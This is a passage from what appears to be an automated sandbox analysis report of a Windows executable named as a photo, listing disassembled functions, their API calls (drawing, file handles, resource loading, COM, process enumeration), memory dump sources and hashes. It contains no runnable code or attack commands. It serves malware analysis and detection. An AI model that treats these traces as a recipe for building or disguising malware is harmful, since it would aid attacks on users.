                                                                • CreatePen.GDI32(00000006,?,?), ref: 0041E6A5
                                                                • SelectObject.GDI32(?,00000000), ref: 0041E6B6
                                                                • GetStockObject.GDI32(00000005), ref: 0041E6BD
                                                                • SelectObject.GDI32(?,00000000), ref: 0041E6C5
                                                                • RoundRect.GDI32(?,?,?,?,?,?,?), ref: 0041E6D9
                                                                • SelectObject.GDI32(?,?), ref: 0041E6E3
                                                                • DeleteObject.GDI32(?), ref: 0041E6E8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Object$Select$CreateDeleteRectRoundStock
                                                                • String ID:
                                                                • API String ID: 1454345155-0
                                                                • Opcode ID: 6dd1d1c0f19a89d45add31c474beffc855adf1fbca3bceb205cb5587ba9077d9
                                                                • Instruction ID: c81786a392c8aa41c50666f54a5765d02d6667797095d82a3ce4832173c427d6
                                                                • Opcode Fuzzy Hash: 6dd1d1c0f19a89d45add31c474beffc855adf1fbca3bceb205cb5587ba9077d9
                                                                • Instruction Fuzzy Hash: 7B0124B2400208BFDF152FA1DC09CAF7EBAFB88311F004409F647824A0EA799565EB30
                                                                Function 0041E611 Relevance: 10.5, APIs: 7, Instructions: 44COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreatePen.GDI32(00000006,?,?), ref: 0041E638
                                                                • SelectObject.GDI32(?,00000000), ref: 0041E649
                                                                • GetStockObject.GDI32(00000005), ref: 0041E650
                                                                • SelectObject.GDI32(?,00000000), ref: 0041E658
                                                                • Rectangle.GDI32(?,?,?,?,?), ref: 0041E666
                                                                • SelectObject.GDI32(?,?), ref: 0041E670
                                                                • DeleteObject.GDI32(?), ref: 0041E675
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Object$Select$CreateDeleteRectangleStock
                                                                • String ID:
                                                                • API String ID: 2689421921-0
                                                                • Opcode ID: 9d1fbd35efe2acc44359ecdddeb0c617016f0e9534986fa0a72e70f54042ea95
                                                                • Instruction ID: e469bacfee9e42181e8338a5cf9f477c67ffe9a4a5989c294537da52fb2816ab
                                                                • Opcode Fuzzy Hash: 9d1fbd35efe2acc44359ecdddeb0c617016f0e9534986fa0a72e70f54042ea95
                                                                • Instruction Fuzzy Hash: 68F03CB2500608BFDF142BA5DC0DCBF7EBAFB89311F004519F647825A0EA799555EB70
                                                                Function 00413453 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 37libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(User32.dll), ref: 00413461
                                                                • GetProcAddress.KERNEL32(00000000,SetLayeredWindowAttributes), ref: 00413471
                                                                • GetWindowLongW.USER32(?,000000EC), ref: 00413482
                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 004134AA
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: LongWindow$AddressHandleModuleProc
                                                                • String ID: SetLayeredWindowAttributes$User32.dll
                                                                • API String ID: 1792074081-2510956139
                                                                • Opcode ID: 1ac762ed1c2b3feafb878d65f4601b0c8d5e6dab2c2fdaf95d5c1a7e175a7cd9
                                                                • Instruction ID: e1dd409a51633e50cd6d9a59ccdb13c6afd9fd635a26a5f2cb747b2c3086fc23
                                                                • Opcode Fuzzy Hash: 1ac762ed1c2b3feafb878d65f4601b0c8d5e6dab2c2fdaf95d5c1a7e175a7cd9
                                                                • Instruction Fuzzy Hash: ACF06834140205FBDF256F61CC09B9A7EA9AF11792F20452EF552905E0DBB9CE84DB29
                                                                Function 02479828 Relevance: 9.3, APIs: 6, Instructions: 301COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 02479832
                                                                • wsprintfA.USER32 ref: 024798C1
                                                                • wsprintfA.USER32 ref: 02479BE4
                                                                  • Part of subcall function 02478356: __fassign.LIBCMT ref: 02478369
                                                                • _wprintf.LIBCMT ref: 02479960
                                                                • std::_Xinvalid_argument.LIBCPMT ref: 02479BC0
                                                                • OutputDebugStringA.KERNEL32(?,?,?,?,?,?,10016B40,000000FF), ref: 02479BFA
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288761111.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2470000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: wsprintf$DebugH_prolog3_OutputStringXinvalid_argument__fassign_wprintfstd::_
                                                                • String ID:
                                                                • API String ID: 2279894289-0
                                                                • Opcode ID: ec794828a6bd9f3b963b13b29f515d160733c95642d2295ed7e4d34a9aa5dec2
                                                                • Instruction ID: 0d7f6e635ce73746f849a983444f5e67964c945e8388b1775b149f570d98ffe1
                                                                • Opcode Fuzzy Hash: ec794828a6bd9f3b963b13b29f515d160733c95642d2295ed7e4d34a9aa5dec2
                                                                • Instruction Fuzzy Hash: 28C13A71D012699BDF22DFA5CC80BDDBBB9BF04300F5044AAE929AB241E7309B85CF51
                                                                Function 00486280 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 357COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • std::exception::exception.LIBCMT ref: 0048664C
                                                                • __CxxThrowException@8.LIBCMT ref: 00486667
                                                                Strings
                                                                • P):, xrefs: 00486702
                                                                • Missing ',' or '}' in object declaration, xrefs: 0048668C
                                                                • Missing '}' or object member name, xrefs: 00486516
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Exception@8Throwstd::exception::exception
                                                                • String ID: Missing ',' or '}' in object declaration$Missing '}' or object member name$P):
                                                                • API String ID: 3728558374-1863290893
                                                                • Opcode ID: bb73911016cce09a9d4ff95e37ad5037752d9b2d3005301234182e3ed911638e
                                                                • Instruction ID: ead2d652cda4cd66b68f20116168e435658982f2cca27c0902f8ea2914b097e6
                                                                • Opcode Fuzzy Hash: bb73911016cce09a9d4ff95e37ad5037752d9b2d3005301234182e3ed911638e
                                                                • Instruction Fuzzy Hash: 38E1E471E002089BDF20EFA9C481BEEF7B2AF45704F15885ED50A67382DB785A45CF99
                                                                Function 00428770 Relevance: 9.1, APIs: 6, Instructions: 102fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,0062959C,005FD8E0,005FD8E0,?,0042962C,?,?,?), ref: 004287BD
                                                                • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002,00000000,0062959C,005FD8E0,005FD8E0,?,0042962C,?,?,?,?,00429BB8,?), ref: 004287E6
                                                                • GetCurrentProcess.KERNEL32(?,00000000,?,0042962C,?,?,?,?,00429BB8,?,?,?,?,?,004133D6,?), ref: 004287EC
                                                                • DuplicateHandle.KERNEL32(00000000,?,0042962C,?,?,?,?,00429BB8,?,?,?,?,?,004133D6,?,00000000), ref: 004287EF
                                                                • GetFileType.KERNEL32(?,?,0042962C,?,?,?,?,00429BB8,?,?,?,?,?,004133D6,?,00000000), ref: 00428807
                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,0042962C,?,?,?,?,00429BB8,?,?,?,?), ref: 00428864
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: File$CurrentProcess$CreateDuplicateHandlePointerType
                                                                • String ID:
                                                                • API String ID: 3364526186-0
                                                                • Opcode ID: 0abf1eca7fe4b6ef42e8fbede883e5c55d5d65d3cf99afbb549b2735503a9363
                                                                • Instruction ID: acb09553cc708ed05bf548b4cc0d051174db5a3f26b79a19f54f94ec78b7621c
                                                                • Opcode Fuzzy Hash: 0abf1eca7fe4b6ef42e8fbede883e5c55d5d65d3cf99afbb549b2735503a9363
                                                                • Instruction Fuzzy Hash: EC31ECB5B00318AFDB219F68EC84A9EBFB8EF05300F50885EF48697350D6749980CB24
                                                                Function 004166C3 Relevance: 9.1, APIs: 6, Instructions: 100COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _memset$H_prolog3
                                                                • String ID:
                                                                • API String ID: 2144794740-0
                                                                • Opcode ID: e523745ac4c44f1f9e406d8385fd99475ddf7a9b2939828f5f7d0cf8b0a2cca2
                                                                • Instruction ID: f953b2a45edc392b477001945ba818f2b67a0d5fbf079c36f2e9009a7937f7b1
                                                                • Opcode Fuzzy Hash: e523745ac4c44f1f9e406d8385fd99475ddf7a9b2939828f5f7d0cf8b0a2cca2
                                                                • Instruction Fuzzy Hash: 175188B0842B448FD365DF2AC581A97FBE8FF08304F80592EA5AE87651DB74B244CF59
                                                                Function 02471034 Relevance: 9.1, APIs: 6, Instructions: 85comstringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CoInitialize.OLE32(00000000), ref: 02471054
                                                                • CoCreateInstance.COMBASE(10017278,00000000,00000001,10017268,?), ref: 02471076
                                                                • lstrlen.KERNEL32 ref: 024710AF
                                                                • _memset.LIBCMT ref: 024710E4
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,?,000000FF,?,00000104), ref: 02471103
                                                                • CoUninitialize.COMBASE ref: 02471135
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288761111.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2470000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: ByteCharCreateInitializeInstanceMultiUninitializeWide_memsetlstrlen
                                                                • String ID:
                                                                • API String ID: 2586284713-0
                                                                • Opcode ID: ac9284026b73fbee676fa63196b45b1fcdfd8f3f692b027c6edf3db1dc2191bd
                                                                • Instruction ID: 2922ed4b8bb24fd59bfa3c0bf908dbf234735e4fc2095aa0cb773fdb9078a433
                                                                • Opcode Fuzzy Hash: ac9284026b73fbee676fa63196b45b1fcdfd8f3f692b027c6edf3db1dc2191bd
                                                                • Instruction Fuzzy Hash: 953107B4A40228AFDB10DBA4CC8CAEA77B9FF59704F104599F519DB250DA709A81CF60
                                                                Function 10001030 Relevance: 9.1, APIs: 6, Instructions: 85comstringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CoInitialize.OLE32(00000000), ref: 10001050
                                                                • CoCreateInstance.COMBASE(10017278,00000000,00000001,10017268,?), ref: 10001072
                                                                • lstrlen.KERNEL32 ref: 100010AB
                                                                • _memset.LIBCMT ref: 100010E0
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,?,000000FF,?,00000104), ref: 100010FF
                                                                • CoUninitialize.COMBASE ref: 10001131
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3289331015.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_10001000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: ByteCharCreateInitializeInstanceMultiUninitializeWide_memsetlstrlen
                                                                • String ID:
                                                                • API String ID: 2586284713-0
                                                                • Opcode ID: ac9284026b73fbee676fa63196b45b1fcdfd8f3f692b027c6edf3db1dc2191bd
                                                                • Instruction ID: ac1339e8a26476a343ece4beee8e0933947ee5251eb98b3c0bf2324ef1832f68
                                                                • Opcode Fuzzy Hash: ac9284026b73fbee676fa63196b45b1fcdfd8f3f692b027c6edf3db1dc2191bd
                                                                • Instruction Fuzzy Hash: E631F6B4A80228AFDB10DBA4CC8CEEA77B9FF59700F104598F519DB251DA719A81CF61
                                                                Function 00421B8F Relevance: 9.1, APIs: 6, Instructions: 71COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • FindResourceW.KERNEL32(00000000,?,?,?,00000000,?,?,?,00411C5D,?,00000000,?,?,00000000), ref: 00421BD4
                                                                • LoadResource.KERNEL32(00000000,00000000,?,?,?,00411C5D,?,00000000,?,?,00000000), ref: 00421BE7
                                                                • FreeResource.KERNEL32(00000000,?,?,?,00411C5D,?,00000000,?,?,00000000), ref: 00421BF4
                                                                • SizeofResource.KERNEL32(00000000,00000000,?,?,?,00411C5D,?,00000000,?,?,00000000), ref: 00421C0B
                                                                • LockResource.KERNEL32(00000000,00000000,?,?,?,00411C5D,?,00000000,?,?,00000000), ref: 00421C13
                                                                • FreeResource.KERNEL32(00000000,?,00000000,?,?,?,00411C5D,?,00000000,?,?,00000000), ref: 00421C25
                                                                  • Part of subcall function 004254CD: _wcslen.LIBCMT ref: 004254DD
                                                                  • Part of subcall function 004254CD: _malloc.LIBCMT ref: 004254E7
                                                                  • Part of subcall function 004254CD: _memmove.LIBCMT ref: 004254F3
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Resource$Free$FindLoadLockSizeof_malloc_memmove_wcslen
                                                                • String ID:
                                                                • API String ID: 803218430-0
                                                                • Opcode ID: fc591ef7e7ac20487678617d164935968b03d7eb9bfb740b66f2dea9d7f9cd8c
                                                                • Instruction ID: 65ccddfd66502b70206fc30bb3549a6e91fcb012364ab669fb7ca98f8c5a7678
                                                                • Opcode Fuzzy Hash: fc591ef7e7ac20487678617d164935968b03d7eb9bfb740b66f2dea9d7f9cd8c
                                                                • Instruction Fuzzy Hash: D511D379700615AB8F107F75AC04EAF3B7DAF66351740060AFC06C3621EB38DE4196B9
                                                                Function 0041E569 Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Object$Select$CreateDeleteIndirectLineMove
                                                                • String ID:
                                                                • API String ID: 191790629-0
                                                                • Opcode ID: 7278dc287a4d7dd52cef862ce2943aa3c6251fb4c717c994401a7ee45ebffdc3
                                                                • Instruction ID: 6e1ef4d11fabec14c59abbf0bffb653094f93a007c2913e99a60ae7489d737da
                                                                • Opcode Fuzzy Hash: 7278dc287a4d7dd52cef862ce2943aa3c6251fb4c717c994401a7ee45ebffdc3
                                                                • Instruction Fuzzy Hash: 6C212C71900208EFCF04DFA9DC458EEBBF5FF48301F10442AE602A2660D7359955EB60
                                                                Function 02471802 Relevance: 9.1, APIs: 6, Instructions: 51processstringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02471825
                                                                • _memset.LIBCMT ref: 0247183A
                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 02471854
                                                                • lstrcmpiW.KERNEL32(?,?), ref: 02471869
                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0247187B
                                                                • CloseHandle.KERNEL32(00000000), ref: 0247188E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288761111.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2470000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memsetlstrcmpi
                                                                • String ID:
                                                                • API String ID: 2129496168-0
                                                                • Opcode ID: 6cd2db591caeb24139dd8c109cfb9bb9e2c04cf5f75738cd7da83e42727f2482
                                                                • Instruction ID: 6fb2f1866457ea1d483ff8e367ddfeb1ae275b2f081800f2f00496c752ac2792
                                                                • Opcode Fuzzy Hash: 6cd2db591caeb24139dd8c109cfb9bb9e2c04cf5f75738cd7da83e42727f2482
                                                                • Instruction Fuzzy Hash: EB11CC71A10218EBEB11EFA5DDC8AAEB7BCBB48744F0140AAE519D2150D778DA45CF60
                                                                Function 0247D823 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • __getptd.LIBCMT ref: 0247D82F
                                                                  • Part of subcall function 0247E1CD: __getptd_noexit.LIBCMT ref: 0247E1D0
                                                                  • Part of subcall function 0247E1CD: __amsg_exit.LIBCMT ref: 0247E1DD
                                                                • __amsg_exit.LIBCMT ref: 0247D84F
                                                                • __lock.LIBCMT ref: 0247D85F
                                                                • InterlockedDecrement.KERNEL32(?), ref: 0247D87C
                                                                • _free.LIBCMT ref: 0247D88F
                                                                • InterlockedIncrement.KERNEL32(1001F670), ref: 0247D8A7
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288761111.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2470000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                • String ID:
                                                                • API String ID: 3470314060-0
                                                                • Opcode ID: 5fed012fe936d225858e2995b53f5f9783d1e47c3892c9d52ee53239d83ab5ab
                                                                • Instruction ID: 5431e8fd7613819138cf34b41622e3b3ad684c97e1411b362aa3998687636a24
                                                                • Opcode Fuzzy Hash: 5fed012fe936d225858e2995b53f5f9783d1e47c3892c9d52ee53239d83ab5ab
                                                                • Instruction Fuzzy Hash: FE018035D10721EBEB22AF6588447EE7761BF04B14F16429FE835AB690C7349581CFD2
                                                                Function 1000D81F Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • __getptd.LIBCMT ref: 1000D82B
                                                                  • Part of subcall function 1000E1C9: __getptd_noexit.LIBCMT ref: 1000E1CC
                                                                  • Part of subcall function 1000E1C9: __amsg_exit.LIBCMT ref: 1000E1D9
                                                                • __amsg_exit.LIBCMT ref: 1000D84B
                                                                • __lock.LIBCMT ref: 1000D85B
                                                                • InterlockedDecrement.KERNEL32(?), ref: 1000D878
                                                                • _free.LIBCMT ref: 1000D88B
                                                                • InterlockedIncrement.KERNEL32(1001F670), ref: 1000D8A3
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3289331015.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                Joe Sandbox IDA Plugin
